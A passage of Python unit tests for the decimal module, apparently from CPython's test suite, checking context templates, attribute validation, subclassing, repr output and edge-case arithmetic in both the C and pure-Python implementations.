context.traps[FloatOperation] = True self.assertTrue(context.traps[FloatOperation]) self.assertTrue(context.traps[Inexact]) class CContextFlags(ContextFlags): decimal = C class PyContextFlags(ContextFlags): decimal = P class SpecialContexts(unittest.TestCase): """Test the context templates.""" def test_context_templates(self): BasicContext = self.decimal.BasicContext ExtendedContext = self.decimal.ExtendedContext getcontext = self.decimal.getcontext setcontext = self.decimal.setcontext InvalidOperation = self.decimal.InvalidOperation DivisionByZero = self.decimal.DivisionByZero Overflow = self.decimal.Overflow Underflow = self.decimal.Underflow Clamped = self.decimal.Clamped assert_signals(self, BasicContext, 'traps', [InvalidOperation, DivisionByZero, Overflow, Underflow, Clamped] ) savecontext = getcontext().copy() basic_context_prec = BasicContext.prec extended_context_prec = ExtendedContext.prec ex = None try: BasicContext.prec = ExtendedContext.prec = 441 for template in BasicContext, ExtendedContext: setcontext(template) c = getcontext() self.assertIsNot(c, template) self.assertEqual(c.prec, 441) except Exception as e: ex = e.__class__ finally: BasicContext.prec = basic_context_prec ExtendedContext.prec = extended_context_prec setcontext(savecontext) if ex: raise ex def test_default_context(self): DefaultContext = self.decimal.DefaultContext BasicContext = self.decimal.BasicContext ExtendedContext = self.decimal.ExtendedContext getcontext = self.decimal.getcontext setcontext = self.decimal.setcontext InvalidOperation = self.decimal.InvalidOperation DivisionByZero = self.decimal.DivisionByZero Overflow = self.decimal.Overflow self.assertEqual(BasicContext.prec, 9) self.assertEqual(ExtendedContext.prec, 9) assert_signals(self, DefaultContext, 'traps', [InvalidOperation, DivisionByZero, Overflow] ) savecontext = getcontext().copy() default_context_prec = DefaultContext.prec ex = None try: c = getcontext() saveprec = c.prec DefaultContext.prec = 961 c = getcontext() self.assertEqual(c.prec, saveprec) setcontext(DefaultContext) c = getcontext() self.assertIsNot(c, DefaultContext) self.assertEqual(c.prec, 961) except Exception as e: ex = e.__class__ finally: DefaultContext.prec = default_context_prec setcontext(savecontext) if ex: raise ex class CSpecialContexts(SpecialContexts): decimal = C class PySpecialContexts(SpecialContexts): decimal = P class ContextInputValidation(unittest.TestCase): def test_invalid_context(self): Context = self.decimal.Context DefaultContext = self.decimal.DefaultContext c = DefaultContext.copy() # prec, Emax for attr in ['prec', 'Emax']: setattr(c, attr, 999999) self.assertEqual(getattr(c, attr), 999999) self.assertRaises(ValueError, setattr, c, attr, -1) self.assertRaises(TypeError, setattr, c, attr, 'xyz') # Emin setattr(c, 'Emin', -999999) self.assertEqual(getattr(c, 'Emin'), -999999) self.assertRaises(ValueError, setattr, c, 'Emin', 1) self.assertRaises(TypeError, setattr, c, 'Emin', (1,2,3)) self.assertRaises(TypeError, setattr, c, 'rounding', -1) self.assertRaises(TypeError, setattr, c, 'rounding', 9) self.assertRaises(TypeError, setattr, c, 'rounding', 1.0) self.assertRaises(TypeError, setattr, c, 'rounding', 'xyz') # capitals, clamp for attr in ['capitals', 'clamp']: self.assertRaises(ValueError, setattr, c, attr, -1) self.assertRaises(ValueError, setattr, c, attr, 2) self.assertRaises(TypeError, setattr, c, attr, [1,2,3]) # Invalid attribute self.assertRaises(AttributeError, setattr, c, 'emax', 100) # Invalid signal dict self.assertRaises(TypeError, setattr, c, 'flags', []) self.assertRaises(KeyError, setattr, c, 'flags', {}) self.assertRaises(KeyError, setattr, c, 'traps', {'InvalidOperation':0}) # Attributes cannot be deleted for attr in ['prec', 'Emax', 'Emin', 'rounding', 'capitals', 'clamp', 'flags', 'traps']: self.assertRaises(AttributeError, c.__delattr__, attr) # Invalid attributes self.assertRaises(TypeError, getattr, c, 9) self.assertRaises(TypeError, setattr, c, 9) # Invalid values in constructor self.assertRaises(TypeError, Context, rounding=999999) self.assertRaises(TypeError, Context, rounding='xyz') self.assertRaises(ValueError, Context, clamp=2) self.assertRaises(ValueError, Context, capitals=-1) self.assertRaises(KeyError, Context, flags=["P"]) self.assertRaises(KeyError, Context, traps=["Q"]) # Type error in conversion self.assertRaises(TypeError, Context, flags=(0,1)) self.assertRaises(TypeError, Context, traps=(1,0)) class CContextInputValidation(ContextInputValidation): decimal = C class PyContextInputValidation(ContextInputValidation): decimal = P class ContextSubclassing(unittest.TestCase): def test_context_subclassing(self): decimal = self.decimal Decimal = decimal.Decimal Context = decimal.Context Clamped = decimal.Clamped DivisionByZero = decimal.DivisionByZero Inexact = decimal.Inexact Overflow = decimal.Overflow Rounded = decimal.Rounded Subnormal = decimal.Subnormal Underflow = decimal.Underflow InvalidOperation = decimal.InvalidOperation class MyContext(Context): def __init__(self, prec=None, rounding=None, Emin=None, Emax=None, capitals=None, clamp=None, flags=None, traps=None): Context.__init__(self) if prec is not None: self.prec = prec if rounding is not None: self.rounding = rounding if Emin is not None: self.Emin = Emin if Emax is not None: self.Emax = Emax if capitals is not None: self.capitals = capitals if clamp is not None: self.clamp = clamp if flags is not None: if isinstance(flags, list): flags = {v:(v in flags) for v in OrderedSignals[decimal] + flags} self.flags = flags if traps is not None: if isinstance(traps, list): traps = {v:(v in traps) for v in OrderedSignals[decimal] + traps} self.traps = traps c = Context() d = MyContext() for attr in ('prec', 'rounding', 'Emin', 'Emax', 'capitals', 'clamp', 'flags', 'traps'): self.assertEqual(getattr(c, attr), getattr(d, attr)) # prec self.assertRaises(ValueError, MyContext, **{'prec':-1}) c = MyContext(prec=1) self.assertEqual(c.prec, 1) self.assertRaises(InvalidOperation, c.quantize, Decimal('9e2'), 0) # rounding self.assertRaises(TypeError, MyContext, **{'rounding':'XYZ'}) c = MyContext(rounding=ROUND_DOWN, prec=1) self.assertEqual(c.rounding, ROUND_DOWN) self.assertEqual(c.plus(Decimal('9.9')), 9) # Emin self.assertRaises(ValueError, MyContext, **{'Emin':5}) c = MyContext(Emin=-1, prec=1) self.assertEqual(c.Emin, -1) x = c.add(Decimal('1e-99'), Decimal('2.234e-2000')) self.assertEqual(x, Decimal('0.0')) for signal in (Inexact, Underflow, Subnormal, Rounded, Clamped): self.assertTrue(c.flags[signal]) # Emax self.assertRaises(ValueError, MyContext, **{'Emax':-1}) c = MyContext(Emax=1, prec=1) self.assertEqual(c.Emax, 1) self.assertRaises(Overflow, c.add, Decimal('1e99'), Decimal('2.234e2000')) if self.decimal == C: for signal in (Inexact, Overflow, Rounded): self.assertTrue(c.flags[signal]) # capitals self.assertRaises(ValueError, MyContext, **{'capitals':-1}) c = MyContext(capitals=0) self.assertEqual(c.capitals, 0) x = c.create_decimal('1E222') self.assertEqual(c.to_sci_string(x), '1e+222') # clamp self.assertRaises(ValueError, MyContext, **{'clamp':2}) c = MyContext(clamp=1, Emax=99) self.assertEqual(c.clamp, 1) x = c.plus(Decimal('1e99')) self.assertEqual(str(x), '1.000000000000000000000000000E+99') # flags self.assertRaises(TypeError, MyContext, **{'flags':'XYZ'}) c = MyContext(flags=[Rounded, DivisionByZero]) for signal in (Rounded, DivisionByZero): self.assertTrue(c.flags[signal]) c.clear_flags() for signal in OrderedSignals[decimal]: self.assertFalse(c.flags[signal]) # traps self.assertRaises(TypeError, MyContext, **{'traps':'XYZ'}) c = MyContext(traps=[Rounded, DivisionByZero]) for signal in (Rounded, DivisionByZero): self.assertTrue(c.traps[signal]) c.clear_traps() for signal in OrderedSignals[decimal]: self.assertFalse(c.traps[signal]) class CContextSubclassing(ContextSubclassing): decimal = C class PyContextSubclassing(ContextSubclassing): decimal = P @skip_if_extra_functionality class CheckAttributes(unittest.TestCase): def test_module_attributes(self): # Architecture dependent context limits self.assertEqual(C.MAX_PREC, P.MAX_PREC) self.assertEqual(C.MAX_EMAX, P.MAX_EMAX) self.assertEqual(C.MIN_EMIN, P.MIN_EMIN) self.assertEqual(C.MIN_ETINY, P.MIN_ETINY) self.assertTrue(C.HAVE_THREADS is True or C.HAVE_THREADS is False) self.assertTrue(P.HAVE_THREADS is True or P.HAVE_THREADS is False) self.assertEqual(C.__version__, P.__version__) self.assertEqual(dir(C), dir(P)) def test_context_attributes(self): x = [s for s in dir(C.Context()) if '__' in s or not s.startswith('_')] y = [s for s in dir(P.Context()) if '__' in s or not s.startswith('_')] self.assertEqual(set(x) - set(y), set()) def test_decimal_attributes(self): x = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')] y = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')] self.assertEqual(set(x) - set(y), set()) class Coverage(unittest.TestCase): def test_adjusted(self): Decimal = self.decimal.Decimal self.assertEqual(Decimal('1234e9999').adjusted(), 10002) # XXX raise? self.assertEqual(Decimal('nan').adjusted(), 0) self.assertEqual(Decimal('inf').adjusted(), 0) def test_canonical(self): Decimal = self.decimal.Decimal getcontext = self.decimal.getcontext x = Decimal(9).canonical() self.assertEqual(x, 9) c = getcontext() x = c.canonical(Decimal(9)) self.assertEqual(x, 9) def test_context_repr(self): c = self.decimal.DefaultContext.copy() c.prec = 425000000 c.Emax = 425000000 c.Emin = -425000000 c.rounding = ROUND_HALF_DOWN c.capitals = 0 c.clamp = 1 for sig in OrderedSignals[self.decimal]: c.flags[sig] = False c.traps[sig] = False s = c.__repr__() t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \ "Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \ "flags=[], traps=[])" self.assertEqual(s, t) def test_implicit_context(self): Decimal = self.decimal.Decimal localcontext = self.decimal.localcontext with localcontext() as c: c.prec = 1 c.Emax = 1 c.Emin = -1 # abs self.assertEqual(abs(Decimal("-10")), 10) # add self.assertEqual(Decimal("7") + 1, 8) # divide self.assertEqual(Decimal("10") / 5, 2) # divide_int self.assertEqual(Decimal("10") // 7, 1) # fma self.assertEqual(Decimal("1.2").fma(Decimal("0.01"), 1), 1) self.assertIs(Decimal("NaN").fma(7, 1).is_nan(), True) # three arg power self.assertEqual(pow(Decimal(10), 2, 7), 2) # exp self.assertEqual(Decimal("1.01").exp(), 3) # is_normal self.assertIs(Decimal("0.01").is_normal(), False) # is_subnormal self.assertIs(Decimal("0.01").is_subnormal(), True) # ln self.assertEqual(Decimal("20").ln(), 3) # log10 self.assertEqual(Decimal("20").log10(), 1) # logb self.assertEqual(Decimal("580").logb(), 2) # logical_invert self.assertEqual(Decimal("10").logical_invert(), 1) # minus self.assertEqual(-Decimal("-10"), 10) # multiply self.assertEqual(Decimal("2") * 4, 8) # next_minus self.assertEqual(Decimal("10").next_minus(), 9) # next_plus self.assertEqual(Decimal("10").next_plus(), Decimal('2E+1')) # normalize self.assertEqual(Decimal("-10").normalize(), Decimal('-1E+1')) # number_class self.assertEqual(Decimal("10").number_class(), '+Normal') # plus self.assertEqual(+Decimal("-1"), -1) # remainder self.assertEqual(Decimal("10") % 7, 3) # subtract self.assertEqual(Decimal("10") - 7, 3) # to_integral_exact self.assertEqual(Decimal("1.12345").to_integral_exact(), 1) # Boolean functions self.assertTrue(Decimal("1").is_canonical()) self.assertTrue(Decimal("1").is_finite()) self.assertTrue(Decimal("1").is_finite()) self.assertTrue(Decimal("snan").is_snan()) self.assertTrue(Decimal("-1").is_signed()) self.assertTrue(Decimal("0").is_zero()) self.assertTrue(Decimal("0").is_zero()) # Copy with localcontext() as c: c.prec = 10000 x = 1228 ** 1523 y = -Decimal(x) z = y.copy_abs() self.assertEqual(z, x) z = y.copy_negate() self.assertEqual(z, x) z = y.copy_sign(Decimal(1)) self.assertEqual(z, x) def test_divmod(self): Decimal = self.decimal.Decimal localcontext = self.decimal.localcontext InvalidOperation = self.decimal.InvalidOperation DivisionByZero = self.decimal.DivisionByZero with localcontext() as c: q, r = divmod(Decimal("10912837129"), 1001) self.assertEqual(q, Decimal('10901935')) self.assertEqual(r, Decimal('194')) q, r = divmod(Decimal("NaN"), 7) self.assertTrue(q.is_nan() and r.is_nan()) c.traps[InvalidOperation] = False q, r = divmod(Decimal("NaN"), 7) self.assertTrue(q.is_nan() and r.is_nan()) c.traps[InvalidOperation] = False c.clear_flags() q, r = divmod(Decimal("inf"), Decimal("inf")) self.assertTrue(q.is_nan() and r.is_nan()) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() q, r = divmod(Decimal("inf"), 101) self.assertTrue(q.is_infinite() and r.is_nan()) self.assertTrue(c.flags[InvalidOperation]) c.clear_flags() q, r = divmod(Decimal(0), 0) self.assertTrue(q.is_nan() and r.is_nan()) self.assertTrue(c.flags[InvalidOperation]) c.traps[DivisionByZero] = False c.clear_flags() q, r = divmod(Decimal(11), 0) self.assertTrue(q.is_infinite() and r.is_nan()) self.assertTrue(c.flags[InvalidOperation] and c.flags[DivisionByZero]) def test_power(self): Decimal = self.decimal.Decimal localcontext = self.decimal.localcontext Overflow = self.decimal.Overflow Rounded = self.decimal.Rounded with localcontext() as c: c.prec = 3 c.clear_flags() self.assertEqual(Decimal("1.0") ** 100, Decimal('1.00')) self.assertTrue(c.flags[Rounded]) c.prec = 1 c.Emax = 1 c.Emin = -1 c.clear_flags() c.traps[Overflow] = False self.assertEqual(Decimal(10000) ** Decimal("0.5"), Decimal('inf')) self.assertTrue(c.flags[Overflow]) def test_quantize(self): Decimal = self.decimal.Decimal localcontext = self.decimal.localcontext InvalidOperation = self.decimal.InvalidOperation with localcontext() as c: c.prec = 1 c.Emax = 1 c.Emin = -1 c.traps[InvalidOperation] = False x = Decimal(99).quantize(Decimal("1e1")) self.assertTrue(x.is_nan()) def test_radix(self): Decimal = self.decimal.Decimal getcontext = self.decimal.getcontext c = getcontext() self.assertEqual(Decimal("1").radix(), 10) self.assertEqual(c.radix(), 10) def test_rop(self): Decimal = self.decimal.Decimal for attr in ('__radd__', '__rsub__', '__rmul__', '__rtruediv__', '__rdivmod__', '__rmod__', '__rfloordiv__', '__rpow__'): self.assertIs(getattr(Decimal("1"), attr)("xyz"), NotImplemented) def test_round(self): # Python3 behavior: round() returns Decimal Decimal = self.decimal.Decimal localcontext = self.decimal.localcontext with localcontext() as c: c.prec = 28 self.assertEqual(str(Decimal("9.99").__round__()), "10") self.assertEqual(str(Decimal("9.99e-5").__round__()), "0") self.assertEqual(str(Decimal("1.23456789").__round__(5)), "1.23457") self.assertEqual(str(Decimal("1.2345").__round__(10)), "1.2345000000") self.assertEqual(str(Decimal("1.2345").__round__(-10)), "0E+10") self.assertRaises(TypeError, Decimal("1.23").__round__, "5") self.assertRaises(TypeError, Decimal("1.23").__round__, 5, 8) def test_create_decimal(self): c = self.decimal.Context() self.assertRaises(ValueError, c.create_decimal, ["%"]) def test_int(self): Decimal = self.decimal.Decimal localcontext = self.decimal.localcontext with localcontext() as c: c.prec = 9999 x = Decimal(1221**1271) / 10**3923 self.assertEqual(int(x), 1) self.assertEqual(x.to_integral(), 2) def test_copy(self): Context = self.decimal.Context c = Context() c.prec = 10000 x = -(1172 ** 1712) y = c.copy_abs(x) self.assertEqual(y, -x) y = c.copy_negate(x) self.assertEqual(y, -x) y = c.copy_sign(x, 1) self.assertEqual(y, -x) class CCoverage(Coverage): decimal = C class PyCoverage(Coverage): decimal = P class PyFunctionality(unittest.TestCase): """Extra functionality in decimal.py""" def test_py_alternate_formatting(self): # triples giving a format, a Decimal, and the expected result Decimal = P.Decimal localcontext = P.localcontext test_values = [ # Issue 7094: Alternate formatting (specified by #) ('.0e', '1.0', '1e+0'), ('#.0e', '1.0', '1.e+0'), ('.0f', '1.0', '1'), ('#.0f', '1.0', '1.'), ('g', '1.1', '1.1'), ('#g', '1.1', '1.1'), ('.0g', '1', '1'), ('#.0g', '1', '1.'), ('.0%', '1.0', '100%'), ('#.0%', '1.0', '100.%'), ] for fmt, d, result in test_values: self.assertEqual(format(Decimal(d), fmt), result) class PyWhitebox(unittest.TestCase): """White box testing for decimal.py""" def test_py_exact_power(self): # Rarely exercised lines in _power_exact. Decimal = P.Decimal localcontext = P.localcontext with localcontext() as c: c.prec = 8 x = Decimal(2**16) ** Decimal("-0.5") self.assertEqual(x, Decimal('0.00390625')) x = Decimal(2**16) ** Decimal("-0.6") self.assertEqual(x, Decimal('0.0012885819')) x = Decimal("256e7") ** Decimal("-0.5") x = Decimal(152587890625) ** Decimal('-0.0625') self.assertEqual(x, Decimal("0.2")) x = Decimal("152587890625e7") ** Decimal('-0.0625') x = Decimal(5**2659) ** Decimal('-0.0625') c.prec = 1 x = Decimal("152587890625") ** Decimal('-0.5') c.prec = 201 x = Decimal(2**578) ** Decimal("-0.5") def test_py_immutability_operations(self): # Do operations and check that it didn't change internal objects. Decimal = P.Decimal DefaultContext = P.DefaultContext setcontext = P.setcontext c = DefaultContext.copy() c.traps = dict((s, 0) for s in OrderedSignals[P]) setcontext(c) d1 = Decimal('-25e55') b1 = Decimal('-25e55') d2 = Decimal('33e+33') b2 = Decimal('33e+33') def checkSameDec(operation, useOther=False): if useOther: eval("d1." + operation + "(d2)") self.assertEqual(d1._sign, b1._sign) self.assertEqual(d1._int, b1._int) self.assertEqual(d1._exp, b1._exp) self.assertEqual(d2._sign, b2._sign) self.assertEqual(d2._int, b2._int) self.assertEqual(d2._exp, b2._exp) else: eval("d1." + operation + "()") self.assertEqual(d1._sign, b1._sign) self.assertEqual(d1._int, b1._int) self.assertEqual(d1._exp, b1._exp) Decimal(d1) self.assertEqual(d1._sign, b1._sign) self.assertEqual(d1._int, b1._int) self.assertEqual(d1._exp, b1._exp) checkSameDec("__abs__") checkSameDec("__add__", True) checkSameDec("__divmod__", True) checkSameDec("__eq__", True) checkSameDec("__ne__", True) checkSameDec("__le__", True) checkSameDec("__lt__", True) checkSameDec("__ge__", True) checkSameDec("__gt__", True) checkSameDec("__float__") checkSameDec("__floordiv__", True) checkSameDec("__hash__") checkSameDec("__int__") checkSameDec("__trunc__") checkSameDec("__mod__", True) checkSameDec("__mul__", True) checkSameDec("__neg__") checkSameDec("__bool__") checkSameDec("__pos__") checkSameDec("__pow__", True) checkSameDec("__radd__", True) checkSameDec("__rdivmod__", True) checkSameDec("__repr__") checkSameDec("__rfloordiv__", True) checkSameDec("__rmod__", True) checkSameDec("__rmul__", True) checkSameDec("__rpow__", True) checkSameDec("__rsub__", True) checkSameDec("__str__") checkSameDec("__sub__", True) checkSameDec("__truediv__", True) checkSameDec("adjusted") checkSameDec("as_tuple") checkSameDec("compare", True) checkSameDec("max", True) checkSameDec("min", True) checkSameDec("normalize") checkSameDec("quantize", True) checkSameDec("remainder_near", True) checkSameDec("same_quantum", True) checkSameDec("sqrt") checkSameDec("to_eng_string") checkSameDec("to_integral") def test_py_decimal_id(self): Decimal = P.Decimal d = Decimal(45) e = Decimal(d) self.assertEqual(str(e), '45') self.assertNotEqual(id(d), id(e)) def test_py_rescale(self): # Coverage Decimal = P.Decimal localcontext = P.localcontext with localcontext() as c: x = Decimal("NaN")._rescale(3, ROUND_UP) self.assertTrue(x.is_nan()) def test_py__round(self): # Coverage Decimal = P.Decimal self.assertRaises(ValueError, Decimal("3.1234")._round, 0, ROUND_UP) class CFunctionality(unittest.TestCase): """Extra functionality in _decimal""" @requires_extra_functionality def test_c_ieee_context(self): # issue 8786: Add support for IEEE 754 contexts to decimal module. IEEEContext = C.IEEEContext DECIMAL32 = C.DECIMAL32 DECIMAL64 = C.DECIMAL64 DECIMAL128 = C.DECIMAL128 def assert_rest(self, context): self.assertEqual(context.clamp, 1) assert_signals(self, context, 'traps', []) assert_signals(self, context, 'flags', []) c = IEEEContext(DECIMAL32) self.assertEqual(c.prec, 7) self.assertEqual(c.Emax, 96) self.assertEqual(c.Emin, -95) assert_rest(self, c) c = IEEEContext(DECIMAL64) self.assertEqual(c.prec, 16) self.assertEqual(c.Emax, 384) self.assertEqual(c.Emin, -383) assert_rest(self, c) c = IEEEContext(DECIMAL128) self.assertEqual(c.prec, 34) self.assertEqual(c.Emax, 6144) self.assertEqual(c.Emin, -6143) assert_rest(self, c) # Invalid values self.assertRaises(OverflowError, IEEEContext, 2**63) self.assertRaises(ValueError, IEEEContext, -1) self.assertRaises(ValueError, IEEEContext, 1024) @requires_extra_functionality def test_c_context(self): Context = C.Context c = Context(flags=C.DecClamped, traps=C.DecRounded) self.assertEqual(c._flags, C.DecClamped) self.assertEqual(c._traps, C.DecRounded) @requires_extra_functionality def test_constants(self): # Condition flags cond = ( C.DecClamped, C.DecConversionSyntax, C.DecDivisionByZero, C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError, C.DecInexact, C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError, C.DecFloatOperation, C.DecOverflow, C.DecRounded, C.DecSubnormal, C.DecUnderflow ) # IEEEContext self.assertEqual(C.DECIMAL32, 32) self.assertEqual(C.DECIMAL64, 64) self.assertEqual(C.DECIMAL128, 128) self.assertEqual(C.IEEE_CONTEXT_MAX_BITS, 512) # Conditions for i, v in enumerate(cond): self.assertEqual(v, 1<<i) self.assertEqual(C.DecIEEEInvalidOperation, C.DecConversionSyntax| C.DecDivisionImpossible| C.DecDivisionUndefined| C.DecFpuError| C.DecInvalidContext| C.DecInvalidOperation| C.DecMallocError) self.assertEqual(C.DecErrors, C.DecIEEEInvalidOperation| C.DecDivisionByZero) self.assertEqual(C.DecTraps, C.DecErrors|C.DecOverflow|C.DecUnderflow) class CWhitebox(unittest.TestCase): """Whitebox testing for _decimal""" def test_bignum(self): # Not exactly whitebox, but too slow with pydecimal. Decimal = C.Decimal localcontext = C.localcontext b1 = 10**35 b2 = 10**36 with localcontext() as c: c.prec = 1000000 for i in range(5): a = random.randrange(b1, b2) b = random.randrange(1000, 1200) x = a ** b y = Decimal(a) ** Decimal(b) self.assertEqual(x, y) def test_invalid_construction(self): self.assertRaises(TypeError, C.Decimal, 9, "xyz") def test_c_input_restriction(self): # Too large for _decimal to be converted exactly Decimal = C.Decimal InvalidOperation = C.InvalidOperation Context = C.Context localcontext = C.localcontext with localcontext(Context()): self.assertRaises(InvalidOperation, Decimal, "1e9999999999999999999") def test_c_context_repr(self): # This test is _decimal-only because flags are not printed # in the same order. DefaultContext = C.DefaultContext FloatOperation = C.FloatOperation c = DefaultContext.copy() c.prec = 425000000 c.Emax = 425000000 c.Emin = -425000000 c.rounding = ROUND_HALF_DOWN c.capitals = 0 c.clamp = 1 for sig in OrderedSignals[C]: c.flags[sig] = True c.traps[sig] = True c.flags[FloatOperation] = True c.traps[FloatOperation] = True s = c.__repr__() t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \ "Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \ "flags=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \ "FloatOperation, Overflow, Rounded, Subnormal, Underflow], " \ "traps=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \ "FloatOperation, Overflow, Rounded, Subnormal, Underflow])" self.assertEqual(s, t) def test_c_context_errors(self): Context = C.Context InvalidOperation = C.InvalidOperation Overflow = C.Overflow FloatOperation = C.FloatOperation localcontext = C.localcontext getcontext = C.getcontext setcontext = C.setcontext HAVE_CONFIG_64 = (C.MAX_PREC > 425000000) c = Context() # SignalDict: input validation self.assertRaises(KeyError, c.flags.__setitem__, 801, 0) self.assertRaises(KeyError, c.traps.__setitem__, 801, 0) self.assertRaises(ValueError, c.flags.__delitem__, Overflow) self.assertRaises(ValueError, c.traps.__delitem__, InvalidOperation) self.assertRaises(TypeError, setattr, c, 'flags', ['x']) self.assertRaises(TypeError, setattr, c,'traps', ['y']) self.assertRaises(KeyError, setattr, c, 'flags', {0:1}) self.assertRaises(KeyError, setattr, c, 'traps', {0:1}) # Test assignment from a signal dict with the correct length but # one invalid key. d = c.flags.copy() del d[FloatOperation] d["XYZ"] = 91283719 self.assertRaises(KeyError, setattr, c, 'flags', d) self.assertRaises(KeyError, setattr, c, 'traps', d) # Input corner cases int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1 gt_max_emax = 10**18 if HAVE_CONFIG_64 else 10**9 # prec, Emax, Emin for attr in ['prec', 'Emax']: self.assertRaises(ValueError, setattr, c, attr, gt_max_emax) self.assertRaises(ValueError, setattr, c, 'Emin', -gt_max_emax) # prec, Emax, Emin in context constructor self.assertRaises(ValueError, Context, prec=gt_max_emax) self.assertRaises(ValueError, Context, Emax=gt_max_emax) self.assertRaises(ValueError, Context, Emin=-gt_max_emax) # Overflow in conversion self.assertRaises(OverflowError, Context, prec=int_max+1) self.assertRaises(OverflowError, Context, Emax=int_max+1) self.assertRaises(OverflowError, Context, Emin=-int_max-2) self.assertRaises(OverflowError, Context, clamp=int_max+1) self.assertRaises(OverflowError, Context, capitals=int_max+1) # OverflowError, general ValueError for attr in ('prec', 'Emin', 'Emax', 'capitals', 'clamp'): self.assertRaises(OverflowError, setattr, c, attr, int_max+1) self.assertRaises(OverflowError, setattr, c, attr, -int_max-2) if sys.platform != 'win32': self.assertRaises(ValueError, setattr, c, attr, int_max) self.assertRaises(ValueError, setattr, c, attr, -int_max-1) # OverflowError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax if C.MAX_PREC == 425000000: self.assertRaises(OverflowError, getattr(c, '_unsafe_setprec'), int_max+1) self.assertRaises(OverflowError, getattr(c, '_unsafe_setemax'), int_max+1) self.assertRaises(OverflowError, getattr(c, '_unsafe_setemin'), -int_max-2) # ValueError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax if C.MAX_PREC == 425000000: self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 0) self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 1070000001) self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), -1) self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), 1070000001) self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), -1070000001) self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), 1) # capitals, clamp for attr in ['capitals', 'clamp']: self.assertRaises(ValueError, setattr, c, attr, -1) self.assertRaises(ValueError, setattr, c, attr, 2) self.assertRaises(TypeError, setattr, c, attr, [1,2,3]) if HAVE_CONFIG_64: self.assertRaises(ValueError, setattr, c, attr, 2**32) self.assertRaises(ValueError, setattr, c, attr, 2**32+1) # Invalid local context self.assertRaises(TypeError, exec, 'with localcontext("xyz"): pass', locals()) self.assertRaises(TypeError, exec, 'with localcontext(context=getcontext()): pass', locals()) # setcontext saved_context = getcontext() self.assertRaises(TypeError, setcontext, "xyz") setcontext(saved_context) def test_rounding_strings_interned(self): self.assertIs(C.ROUND_UP, P.ROUND_UP) self.assertIs(C.ROUND_DOWN, P.ROUND_DOWN) self.assertIs(C.ROUND_CEILING, P.ROUND_CEILING) self.assertIs(C.ROUND_FLOOR, P.ROUND_FLOOR) self.assertIs(C.ROUND_HALF_UP, P.ROUND_HALF_UP) self.assertIs(C.ROUND_HALF_DOWN, P.ROUND_HALF_DOWN) self.assertIs(C.ROUND_HALF_EVEN, P.ROUND_HALF_EVEN) self.assertIs(C.ROUND_05UP, P.ROUND_05UP) @requires_extra_functionality def test_c_context_errors_extra(self): Context = C.Context InvalidOperation = C.InvalidOperation Overflow = C.Overflow localcontext = C.localcontext getcontext = C.getcontext setcontext = C.setcontext HAVE_CONFIG_64 = (C.MAX_PREC > 425000000) c = Context() # Input corner cases int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1 # OverflowError, general ValueError self.assertRaises(OverflowError, setattr, c, '_allcr', int_max+1) self.assertRaises(OverflowError, setattr, c, '_allcr', -int_max-2) if sys.platform != 'win32': self.assertRaises(ValueError, setattr, c, '_allcr', int_max) self.assertRaises(ValueError, setattr, c, '_allcr', -int_max-1) # OverflowError, general TypeError for attr in ('_flags', '_traps'): self.assertRaises(OverflowError, setattr, c, attr, int_max+1) self.assertRaises(OverflowError, setattr, c, attr, -int_max-2) if sys.platform != 'win32': self.assertRaises(TypeError, setattr, c, attr, int_max) self.assertRaises(TypeError, setattr, c, attr, -int_max-1) # _allcr self.assertRaises(ValueError, setattr, c, '_allcr', -1) self.assertRaises(ValueError, setattr, c, '_allcr', 2) self.assertRaises(TypeError, setattr, c, '_allcr', [1,2,3]) if HAVE_CONFIG_64: self.assertRaises(ValueError, setattr, c, '_allcr', 2**32) self.assertRaises(ValueError, setattr, c, '_allcr', 2**32+1) # _flags, _traps for attr in ['_flags', '_traps']: self.assertRaises(TypeError, setattr, c, attr, 999999) self.assertRaises(TypeError, setattr, c, attr, 'x') def test_c_valid_context(self): # These tests are for code coverage in _decimal. DefaultContext = C.DefaultContext Clamped = C.Clamped Underflow = C.Underflow Inexact = C.Inexact Rounded = C.Rounded Subnormal = C.Subnormal c = DefaultContext.copy() # Exercise all getters and setters c.prec = 34 c.rounding = ROUND_HALF_UP c.Emax = 3000 c.Emin = -3000 c.capitals = 1 c.clamp = 0 self.assertEqual(c.prec, 34) self.assertEqual(c.rounding, ROUND_HALF_UP) self.assertEqual(c.Emin, -3000) self.assertEqual(c.Emax, 3000) self.assertEqual(c.capitals, 1) self.assertEqual(c.clamp, 0) self.assertEqual(c.Etiny(), -3033) self.assertEqual(c.Etop(), 2967) # Exercise all unsafe setters if C.MAX_PREC == 425000000: c._unsafe_setprec(999999999) c._unsafe_setemax(999999999) c._unsafe_setemin(-999999999) self.assertEqual(c.prec, 999999999) self.assertEqual(c.Emax, 999999999) self.assertEqual(c.Emin, -999999999) @requires_extra_functionality def test_c_valid_context_extra(self): DefaultContext = C.DefaultContext c = DefaultContext.copy() self.assertEqual(c._allcr, 1) c._allcr = 0 self.assertEqual(c._allcr, 0) def test_c_round(self): # Restricted input. Decimal = C.Decimal InvalidOperation = C.InvalidOperation localcontext = C.localcontext MAX_EMAX = C.MAX_EMAX MIN_ETINY = C.MIN_ETINY int_max = 2**63-1 if C.MAX_PREC > 425000000 else 2**31-1 with localcontext() as c: c.traps[InvalidOperation] = True self.assertRaises(InvalidOperation, Decimal("1.23").__round__, -int_max-1) self.assertRaises(InvalidOperation, Decimal("1.23").__round__, int_max) self.assertRaises(InvalidOperation, Decimal("1").__round__, int(MAX_EMAX+1)) 